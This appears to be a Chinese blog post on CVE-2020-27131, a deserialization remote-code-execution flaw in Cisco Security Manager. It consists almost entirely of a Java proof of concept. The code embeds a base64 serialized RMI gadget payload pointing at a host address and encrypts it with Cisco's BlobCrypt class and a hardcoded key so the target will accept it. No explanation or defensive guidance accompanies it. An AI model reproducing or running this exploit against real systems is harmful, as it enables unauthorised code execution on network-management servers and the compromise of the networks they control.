# CVE-2020-27131 Cisco Security Manager 反序列化RCE漏洞
==POC==
import java.security.InvalidKeyException; import java.util.Base64; import com.cisco.nm.cmf.security.jaas.BlobCrypt; public class JaasEncryptor { public static void main(String args[]) { String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4"; byte[] payload = Base64.getDecoder().decode(b64Payload); byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5}; byte[] enc = BlobCrypt.encryptArray(payload, key); System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc)); byte[] dec = BlobCrypt.decryptArray(enc, key); } }
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容